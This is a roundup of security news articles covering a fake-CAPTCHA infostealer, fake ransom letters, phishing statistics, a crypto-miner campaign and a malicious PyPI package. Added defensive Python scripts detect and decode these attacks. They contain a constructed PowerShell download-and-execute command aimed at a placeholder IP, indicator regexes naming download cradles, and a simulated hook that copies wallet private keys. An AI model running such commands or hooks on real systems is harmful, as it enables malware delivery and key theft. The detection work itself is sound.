Cybercriminals have found a new way to trick Windows users into downloading harmful software by disguising malware as a CAPTCHA test. A recent investigation by security researchers revealed that attackers are using this method to install infostealer malware, which secretly collects sensitive data from infected computers.
How the Scam Works
The attack begins when a user visits a compromised website and encounters what appears to be a routine CAPTCHA verification. Real CAPTCHAs exist only to confirm that a visitor is human; this one is built so that interacting with it results in a malicious command being run on the visitor's machine. A web page cannot launch PowerShell by itself, so the fake check depends on the user carrying out the actions it asks for.
Instead of verifying anything, the fake CAPTCHA kicks off a multi-stage infection chain. The resulting infostealer installs itself and collects sensitive information such as usernames, passwords, and banking details from the infected system.
Step-by-Step Breakdown of the Attack
1. Fake CAPTCHA Displayed: The user sees what looks like a normal CAPTCHA test.
2. PowerShell Command Executed: Interacting with the CAPTCHA causes a PowerShell command to run on the victim's machine, launching the first stage of the infection.
3. Additional Malicious Code Downloaded: That first stage retrieves further stages from attacker-controlled servers, each built to stay under the radar of security tools.
4. Final Infection: The malware, such as Lumma or Vidar, is installed and begins stealing personal data.
How Attackers Evade Detection
Hackers use several techniques to keep their malware hidden from security software:
Obfuscation: The code is rewritten to be hard to read and to defeat signature-based matching by antivirus programs.
Multiple Layers of Encryption: The payload is wrapped in several encoded layers, so that no single stage looks like recognizable malware until it is unpacked in memory.
Bypassing Security Measures: The script changes Windows security settings to prevent detection and removal.
In some cases the payload is disguised with XOR encoding, a cheap reversible transform that hides strings from signature matching but offers no real secrecy, since the key ships alongside the payload and anyone who has it can reverse the process. Some versions also include commands that alter Windows security settings so that the malware's files are treated as safe and not scanned.
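As an added example (not code from the article or the researchers it cites), the following Python triages PowerShell process-creation records for the chain in steps 2 and 3 and peels the two obfuscation layers the evasion section describes: the base64/UTF-16LE form PowerShell's -EncodedCommand expects, and a repeating-key XOR recovered from a known plaintext prefix. The events, URLs and XOR blob are all constructed for the example; the "launched from explorer.exe" heuristic is an assumption about how a user-run command appears in process telemetry.

```python
"""Added example (not from the original article): triaging PowerShell process-creation
records for the fake-CAPTCHA chain and peeling the base64 and XOR layers that the
evasion section describes. Every event, URL and blob below is constructed."""
import base64
import re

# --- Obfuscation layers -----------------------------------------------------

def encode_command(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    return base64.b64decode(b64).decode("utf-16-le")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: a reversible disguise, not encryption."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_xor_key(blob: bytes, crib: bytes, max_keylen: int = 8) -> bytes:
    """Recover a repeating XOR key from a known plaintext prefix (the crib).

    Tries key lengths from 1 up; the first key that turns the whole blob into
    printable ASCII wins. Assumes the crib is at least as long as the key."""
    for keylen in range(1, min(max_keylen, len(crib)) + 1):
        key = xor_bytes(blob[:keylen], crib[:keylen])
        if all(32 <= b < 127 for b in xor_bytes(blob, key)):
            return key
    raise ValueError("no key of length <= %d yields printable text" % max_keylen)

# --- Detection over process-creation records --------------------------------

INDICATORS = {
    r"-(w|win|windowstyle)\s+hidden": "hidden window",
    r"-(ep|exec|executionpolicy)\s+bypass": "execution policy bypass",
    r"\biex\b|invoke-expression": "in-memory execution",
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer": "download cradle",
    r"\bmshta\b|\bcertutil\b|\bbitsadmin\b": "living-off-the-land downloader",
}
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload, if any, so indicators hit inside it."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + "\n" + decode_encoded_command(m.group(1))
    except (ValueError, UnicodeDecodeError):
        return cmdline


def triage(parent: str, image: str, cmdline: str) -> dict:
    text = expand_command(cmdline)
    hits = [label for pat, label in INDICATORS.items() if re.search(pat, text, re.I)]
    # Assumption: because the fake CAPTCHA relies on the user running the command,
    # PowerShell shows up as a child of the desktop shell rather than of a script
    # host or a software-deployment agent.
    if image.lower().endswith("powershell.exe") and parent.lower() == "explorer.exe" and hits:
        hits.append("interactive launch from explorer.exe")
    return {"suspicious": len(hits) >= 2, "indicators": hits, "expanded": text}

# --- Constructed samples ------------------------------------------------------

STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/verify.ps1')"
SAMPLE_EVENTS = [  # (parent image, image, command line); all constructed
    ("explorer.exe", "powershell.exe",
     "powershell -w hidden -nop -ep bypass -enc " + encode_command(STAGE1)),
    ("code.exe", "powershell.exe", "powershell -File .\\build.ps1"),
]
XOR_KEY = b"\x5a\xc3"  # the key a (constructed) stage-one script would carry with it
STAGE2_BLOB = xor_bytes(b"http://198.51.100.7/payload.bin", XOR_KEY)


def analyse_samples() -> list:
    return [triage(*event) for event in SAMPLE_EVENTS]


def recover_stage2_url() -> str:
    """Analyst view: the key is unknown, but the hidden string is known to be a URL."""
    return xor_bytes(STAGE2_BLOB, recover_xor_key(STAGE2_BLOB, b"http://")).decode("ascii")


if __name__ == "__main__":
    for event, verdict in zip(SAMPLE_EVENTS, analyse_samples()):
        print(event[2][:40], "->", verdict["suspicious"], verdict["indicators"])
    print("stage 2:", recover_stage2_url())
```

The indicator list is deliberately generic (hidden window, policy bypass, in-memory execution, download cradle) and requires two hits before flagging, which keeps ordinary `-File build.ps1` launches quiet; tune the threshold against your own telemetry. The crib-based XOR recovery only works when the plaintext prefix is predictable and at least as long as the key, which is true for URLs and most PowerShell stages but not for arbitrary binaries.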
How to Protect Yourself
To avoid falling victim to this scam, follow these precautions:
1. Be Wary of Suspicious CAPTCHAs: A real CAPTCHA only asks you to tick a box or solve a small puzzle inside the browser. If a check asks for anything else, such as running a command or pasting text into a Windows dialog, it is not a CAPTCHA; close the page and do not follow its instructions.
2. Stay on Trusted Websites: Avoid unknown or unverified sites, as they may be compromised.
3. Keep Your System Updated: Install the latest security updates for Windows and your antivirus software.
4. Use Reliable Security Tools: A strong antivirus program can help detect and block suspicious activity.
5. Enable Browser Protections: Modern web browsers offer security features that warn against unsafe websites — keep them turned on.
This deceptive CAPTCHA scam is a reminder that cybercriminals are always coming up with new ways to infect devices and steal personal data. By staying alert and following basic security practices, users can reduce their chances of being targeted by such attacks.
A new scam is targeting top business leaders in the United States, where criminals are sending letters demanding large ransom payments. Unlike typical ransomware attacks that involve hacking into computer systems, this scheme relies on physical mail. The letters claim that hackers have stolen company data and will leak it unless a ransom of $250,000 to $500,000 is paid. However, cybersecurity experts believe this is a fraud, with no actual hacking involved.
How the Scam Works
Investigators from the GuidePoint Research and Intelligence Team (GRIT) discovered that several companies have received these ransom letters through the US Postal Service (USPS). The letters are addressed to high-level executives and claim to be from the BianLian ransomware group, a known cybercriminal organization.
The message states that the company's confidential information has been stolen and will be exposed unless the demanded payment is made within ten days. To make the threat appear real, the letter includes a Bitcoin wallet address and a QR code that links directly to it. Some letters also provide links to BianLian’s dark web site to add legitimacy to the claim.
Despite these details, security analysts have found no proof that any actual data theft has occurred. The scam relies on fear and deception, hoping that executives will panic and send money.
Why Experts Believe the Threat Is Fake
Cybersecurity specialists have carefully examined multiple cases of this scam and found no signs of hacking or data breaches. The companies targeted in this scheme have not reported any unusual activity or unauthorized access to their systems. This strongly suggests that the criminals behind the letters are only pretending to be the BianLian ransomware group.
The FBI has confirmed that these letters are part of a fraud campaign and do not represent a real cyberattack. Many of the envelopes are marked as "Time Sensitive" to create urgency, and some even list a return address in Boston, Massachusetts, which appears to be another false detail.
Since there is no actual ransomware attack, businesses do not need to take technical action like removing malware or restoring stolen files. The main risk comes from executives believing the scam and paying the ransom.
What to Do If You Receive One of These Letters
If your company receives a similar ransom demand, take the following precautions:
1. Check Your Systems for Security Issues – Ensure that company networks are protected and that there are no signs of hacking or data leaks. Keeping cybersecurity measures updated is always important.
2. Do Not Send Any Money – These threats are fake, and paying the ransom will only encourage further scams.
3. Report the Scam – Contact law enforcement and inform the nearest FBI field office about the letter. Complaints can also be filed with the Internet Crime Complaint Center (IC3).
4. Inform Key Personnel – Let executives and employees know about this scam so they can recognize and ignore similar fraud attempts in the future.
This scam is a reminder that cybercriminals do not always rely on advanced hacking techniques. Sometimes, they use old-fashioned methods like physical mail to create fear and manipulate victims into paying. While real ransomware attacks remain a serious concern, this particular scheme is based on false claims.
Companies should stay informed and take precautions to avoid falling victim to these types of fraud. Being aware of such scams is the best way to protect against them.
Recent research from the cybersecurity company NordVPN has revealed a significant rise in online threats, with over 669 million malware attacks recorded in the UK in 2024 alone. This alarming number highlights the increasing risk of falling victim to fake websites, harmful ads, and malicious software, especially when browsing popular websites or using free video streaming platforms.
Fake Websites Imitating Well-Known Brands
Cybercriminals often create websites that look almost identical to popular tech companies like Google, Facebook, and Microsoft. Their main goal is to trick people into providing their login details, which can then be misused for criminal activities.
NordVPN’s research shows that in 2024, over 85,000 fake web links were created to imitate Google's official platforms. Similarly, around 6,000 fake links were designed to look like Facebook, and nearly 5,000 were made to mimic Microsoft. Other major companies such as AT&T, Yahoo!, and Netflix were also targeted, with around 4,000 fake URLs created for each.
A common tactic used by scammers is slightly altering the spelling of well-known brand names, hoping that people won't notice the difference. For example, they may change "Google" to "G00gle" or "Amazon" to "Arnazon." This simple trick often convinces users to enter their login details, unknowingly handing their information over to cybercriminals.
Although these major tech companies have no involvement in the fraud, their popularity makes them easy targets for impersonation. Because people generally trust these brands, they often do not realize they have been scammed until it’s too late.
Malware Hidden on Video Hosting Platforms
Another major source of cyber threats is free video streaming websites, where users often go to watch movies, shows, or anime. According to NordVPN’s findings, over 1.5 billion attempts to infect devices with malware were blocked on such sites in 2024 alone.
Websites related to entertainment, sports, and file-sharing carried the most attempts. Blocked malware attempts on entertainment websites alone reached almost one billion, while sports sites recorded around 124 million. Adult content sites and file-sharing platforms also faced millions of infiltration attempts each.
The risk doesn't stop at malware. Many of these websites are filled with intrusive advertisements and hidden web trackers designed to collect user data. These trackers monitor your online activity, gathering information about your browsing habits, interests, and personal details. While companies use this data to target you with advertisements, it can become dangerous if hackers gain access to it.
Understanding the Threats: Malware, Trackers, and Intrusive Ads
Malware, short for malicious software, refers to harmful programs like viruses, spyware, ransomware, and trojans. If malware infects your device, it can steal your sensitive information, lock your files, or even give hackers full control of your device. This often happens when users unknowingly download files from untrusted websites or click on suspicious links.
Trackers are small tools placed on websites to monitor your online behavior. Companies use this information for marketing purposes, but if the data is leaked, it can be misused by hackers for malicious purposes.
Intrusive advertisements, commonly seen on free video streaming sites, pose another risk. These ads not only disrupt your browsing experience but can also direct you to harmful websites or secretly install malware on your device without your consent.
Tips to Protect Yourself from Cyber Threats
Cybersecurity expert Adrianus Warmenhoven suggests some practical ways to protect yourself from online threats like malware, intrusive ads, and web trackers. Here’s how you can stay safe:
1. Avoid Free or Suspicious Websites
Websites offering free video hosting, downloads, or pirated content often hide harmful software. Avoid visiting such sites, as they are more likely to infect your device with malware.
2. Be Careful with Unknown Emails and Messages
Cybercriminals often use emails or messages that promise big rewards or urgent updates to trick you into giving away personal information. Avoid clicking on links in emails that sound too good to be true or ask for your data.
3. Always Verify Links Before Clicking
Scammers often create fake links that look similar to popular websites. For example, a fake website might spell "Amazon" as "Arnazon" to confuse you. Always double-check the spelling of website links before clicking on them.
4. Check Files Before Downloading
Malware can often be hidden in files disguised as legitimate downloads. To avoid downloading harmful files, always use reliable websites and scan files with antivirus software before opening them.
5. Protect Your Personal Information
Limit the amount of personal information you share online, especially on social media. Cybercriminals can misuse details like your full name, location, or contact information for scams or identity theft.
6. Keep Your Devices Updated
Outdated software can make your device vulnerable to malware and other cyber threats. Regularly update your operating system, apps, and security software to patch any security flaws.
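The spelling tricks described under Fake Websites and again in tip 3 ("G00gle", "Arnazon") can be checked mechanically. The following Python is an added example, not part of the NordVPN report: it normalises look-alike characters, measures edit distance to a short brand list, and also catches a brand name embedded in a longer label or a subdomain. The brand list, the confusable table, the small suffix set and the sample hostnames are all constructed for the example; a production checker would use the Public Suffix List and a much larger brand set.

```python
"""Added example, not part of the NordVPN report: flagging hostnames that imitate a
brand through look-alike spelling. Brand list, confusable table, suffix set and
sample hostnames are constructed for the example."""
import re

BRANDS = ["google", "facebook", "microsoft", "amazon", "netflix", "yahoo", "paypal"]

# Character sequences that pass for each other at a glance. Multi-character entries
# come first so "rn" becomes "m" before single characters are replaced.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"),
               ("3", "e"), ("5", "s"), ("7", "t"), ("@", "a"), ("$", "s")]

# Two-label public suffixes handled by this toy; real code should use the PSL.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp", "org.uk"}


def normalise(label: str) -> str:
    label = label.lower()
    for fake, real in CONFUSABLES:
        label = label.replace(fake, real)
    return label


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute each cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def split_host(hostname: str):
    """Return (subdomain labels, registrable label) for a hostname."""
    labels = hostname.lower().strip(".").split(".")
    suffix_len = 2 if ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 1
    if len(labels) <= suffix_len:
        return [], labels[0]
    return labels[:-suffix_len - 1], labels[-suffix_len - 1]


def classify(hostname: str, max_distance: int = 1):
    """Return None for an unremarkable host, or a dict naming the imitated brand."""
    subdomains, reg = split_host(hostname)
    if reg in BRANDS:
        return None  # the brand's own registrable name; nothing to flag here
    tokens = [t for t in re.split(r"[-_]", reg) if t]
    for brand in BRANDS:
        # "microsoft-login.support" or "paypal.com.secure-verify.net"
        if brand in tokens or brand in subdomains:
            return {"brand": brand, "reason": "brand embedded", "distance": 0}
    norm = normalise(reg)
    brand, dist = min(((b, levenshtein(norm, b)) for b in BRANDS), key=lambda x: x[1])
    if dist <= max_distance:
        return {"brand": brand, "reason": "lookalike spelling", "distance": dist}
    return None


# Constructed hostnames: the first four imitate a brand, the last two are benign.
SAMPLE_HOSTS = ["accounts.g00gle.com", "www.arnazon.co.uk", "microsoft-login.support",
                "paypal.com.secure-verify.net", "netflix.com", "example.org"]


def classify_samples() -> dict:
    return {host: classify(host) for host in SAMPLE_HOSTS}


if __name__ == "__main__":
    for host, verdict in classify_samples().items():
        print(f"{host:32} {verdict or 'ok'}")
```

Normalising before measuring distance is what makes "Arnazon" score as an exact hit rather than a distance-2 miss. Keep the distance threshold low (1 here): brand names are short, and a looser threshold will flag unrelated words.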
By following these steps, you can reduce the risk of falling victim to online threats and ensure your personal information remains safe.
Hackers are spreading the SilentCryptoMiner malware disguised as legitimate software, and it has affected more than 2,000 victims in Russia alone. The distribution relies on coercing YouTubers with large followings into posting the malicious links.
“Such software is often distributed in the form of archives with text installation instructions, in which the developers recommend disabling security solutions, citing false positives,” reports Securelist. This helps threat actors by “allowing them to persist in an unprotected system without the risk of detection.”
“Most active of all have been schemes for distributing popular stealers, remote access tools (RATs), Trojans that provide hidden remote access, and miners that harness computing power to mine cryptocurrency.” A few of the malware families commonly seen in this distribution scheme are Phemedrone, DCRat, NJRat, and XWorm.
In one incident, a YouTuber with 60,000 subscribers posted videos containing links to infected archives and gained over 400,000 views. The malicious files were hosted on gitrok[.]com, where the download counter exceeded 40,000.
Threat actors have also adopted a coercive distribution scheme: they file copyright claims against content creators and influencers and threaten to have their channels shut down unless they post videos containing the malicious links. This abuses the trust that popular YouTubers have built to push the malware to a much larger audience.
The infection chain starts with a modified start script that launches an additional executable via PowerShell.
According to the Securelist report, the loader is written in Python and packaged with PyInstaller, and it fetches the next-stage payload from hardcoded domains. The second-stage loader runs environment checks, adds the “AppData directory to Microsoft Defender exclusions” so that anything dropped there is no longer scanned, and then downloads the final payload, SilentCryptoMiner.
SilentCryptoMiner mines several cryptocurrencies using different algorithms. It uses process hollowing to run the miner code inside a legitimate-looking process for stealth.
The malware also works to evade scrutiny: it pauses mining while particular processes are running and checks for indicators of a virtual machine or sandbox before doing anything.
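The exclusion step above is one of the few moments in this chain that leaves a clear footprint on the host, because Defender logs every configuration change. The following Python is an added example, not from the Securelist report: it scans a handful of log lines for new exclusions and for real-time protection being switched off, and rates an exclusion as high risk when it covers a location any user can write to (AppData, Downloads, Temp, ProgramData). The lines are constructed to resemble the "New value" text of Microsoft Defender operational log event 5007; confirm the exact wording against your own logs before relying on the regexes.

```python
"""Added example, not from the Securelist report: rating Defender exclusion changes
of the kind the loader above performs. Event lines are constructed to resemble the
"New value" text of Defender operational log event 5007 (an assumption to verify)."""
import re

# Constructed records in the form "<event id> | <New value line from the event message>"
SAMPLE_EVENTS = [
    r"5007 | New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\alice\AppData\Roaming = 0x0",
    r"5007 | New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Vendor\db = 0x0",
    r"5007 | New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\.tmp = 0x0",
    r"5007 | New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = 0x1",
    r"1116 | Microsoft Defender Antivirus has detected malware or other potentially unwanted software.",
]

EXCLUSION = re.compile(
    r"Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\(.+?) = 0x0$", re.I)
RTP_OFF = re.compile(
    r"Real-Time Protection\\(DisableRealtimeMonitoring|DisableBehaviorMonitoring|"
    r"DisableIOAVProtection) = 0x1$", re.I)

# Locations any user (and therefore any dropper running as that user) can write to.
USER_WRITABLE = [re.compile(p, re.I) for p in (
    r"^[a-z]:\\users\\[^\\]+\\appdata\\",
    r"^[a-z]:\\users\\[^\\]+\\downloads\\",
    r"^[a-z]:\\users\\public\\",
    r"^[a-z]:\\programdata\\",
    r"^[a-z]:\\windows\\temp\\",
    r"\\temp\\",
)]


def assess_exclusion(kind: str, value: str) -> str:
    kind = kind.lower()
    if kind in ("extensions", "processes"):
        # Every file with that extension, or everything the named process touches,
        # is skipped: trivially abusable, so always high.
        return "high"
    if any(p.search(value) for p in USER_WRITABLE):
        return "high"
    return "review"  # vendor paths under Program Files may be legitimate; confirm


def scan(lines) -> list:
    findings = []
    for line in lines:
        event_id, _, message = line.partition(" | ")
        if event_id.strip() != "5007":
            continue
        m = EXCLUSION.search(message)
        if m:
            findings.append({"type": "exclusion", "kind": m.group(1), "value": m.group(2),
                             "severity": assess_exclusion(m.group(1), m.group(2))})
            continue
        m = RTP_OFF.search(message)
        if m:
            findings.append({"type": "protection disabled", "kind": m.group(1),
                             "value": "1", "severity": "critical"})
    return findings


def scan_samples() -> list:
    return scan(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in scan_samples():
        print(f"[{f['severity']:8}] {f['type']}: {f['kind']} -> {f['value']}")
```

The same rules apply to the live configuration: compare the exclusion list an endpoint reports against a known-good baseline, and treat any entry under a user profile as an incident indicator rather than a housekeeping change.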
The malicious PyPI package set-utils, masquerading as a simple utility for Python set operations, imitates widely used libraries such as python-utils (712M+ downloads) and utils (23.5M+ downloads). Developers who install it by mistake hand the attackers access to Ethereum wallets.
Since the start of this year, set-utils has been downloaded over 1,000 times, exposing Ethereum users and developers to risk. The package targets people working with blockchain technology, especially developers using Python-based wallet management libraries such as eth-account.
The package hooks Ethereum account creation so that newly generated private keys are exfiltrated through the blockchain itself: it uses the public RPC endpoint https://rpc-amoy.polygon.technology/ as its command-and-control (C2) channel. Because the traffic goes to a legitimate public service, it is unlikely to be blocked, and the attackers can retrieve stolen keys covertly.
The package targets Ethereum developers and businesses working with Python-based blockchain applications. These include:
To mitigate this risk, businesses and developers should put robust software supply chain protections in place. Routine dependency audits and automated scanning can surface malicious or suspicious behaviour in third-party packages before they reach production environments.
According to Socket, “Integrating these security measures into development workflows, organizations can significantly reduce the likelihood of supply chain attacks.” Socket notified the PyPI team, and the package “was promptly removed to prevent further attacks.”
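Audits before install are the durable defence, but a cheap runtime tripwire catches the specific trick described here: a dependency replacing a wallet library's key-generation function with its own. The following Python is an added example; it is not Socket's code and does not use eth_account. A stand-in `wallet` module is built inline so the demo runs offline, `install_hook` simulates what a malicious package does at import time, and `EXFIL_LOG` stands in for the attacker's C2 channel (the real package used a public RPC endpoint). The detector, `foreign_overrides`, reports any watched function whose defining module is not the library it is supposed to belong to.

```python
"""Added example for the set-utils write-up (not Socket's code, not eth_account):
a runtime check that detects a library function replaced by code from another module.
The 'wallet' module is a stand-in built inline; EXFIL_LOG stands in for the C2."""
import inspect
import types

WALLET_SOURCE = '''
import os

class Account:
    @staticmethod
    def create():
        """Stand-in for a wallet library's key generator: 32 random bytes."""
        return os.urandom(32)
'''


def make_wallet_module() -> types.ModuleType:
    mod = types.ModuleType("wallet")
    exec(compile(WALLET_SOURCE, "<wallet>", "exec"), mod.__dict__)
    return mod


EXFIL_LOG = []  # simulated attacker-side collection; nothing leaves the process


def install_hook(wallet: types.ModuleType) -> None:
    """Simulates the malicious dependency: wrap Account.create so every new
    private key is copied out before being returned to the caller."""
    original = wallet.Account.create

    def create():
        key = original()
        EXFIL_LOG.append(key.hex())  # the real package sent this to a public RPC endpoint
        return key

    wallet.Account.create = staticmethod(create)


def foreign_overrides(module: types.ModuleType, names) -> list:
    """Return (name, defining module, source file) for each watched attribute whose
    implementing function does not belong to `module`."""
    findings = []
    for dotted in names:
        obj = module
        for part in dotted.split("."):
            obj = getattr(obj, part)
        if isinstance(obj, (staticmethod, classmethod)):
            obj = obj.__func__
        func = inspect.unwrap(obj)  # see through functools.wraps-style wrappers
        home = getattr(func, "__module__", None)
        if home != module.__name__:
            code = getattr(func, "__code__", None)
            findings.append((dotted, home, code.co_filename if code else None))
    return findings


WATCHED = ["Account.create"]  # the functions a wallet-handling app should guard


def demo() -> dict:
    wallet = make_wallet_module()
    before = foreign_overrides(wallet, WATCHED)
    install_hook(wallet)
    key = wallet.Account.create()  # the caller sees a normal key; the copy is already gone
    after = foreign_overrides(wallet, WATCHED)
    return {"before": before, "after": after, "leaked": EXFIL_LOG[-1] == key.hex()}


if __name__ == "__main__":
    result = demo()
    print("clean module:", result["before"] or "no foreign code")
    print("after hook:  ", result["after"])
```

Run the check once at startup, after all imports, against the handful of functions whose output must never leave the process. It is a tripwire rather than a boundary: a determined package can forge `__module__` and `co_filename`, so pin dependencies with hashes, review new packages before they enter the lockfile, and treat a fresh package whose name is one character away from a popular one with the suspicion the article describes.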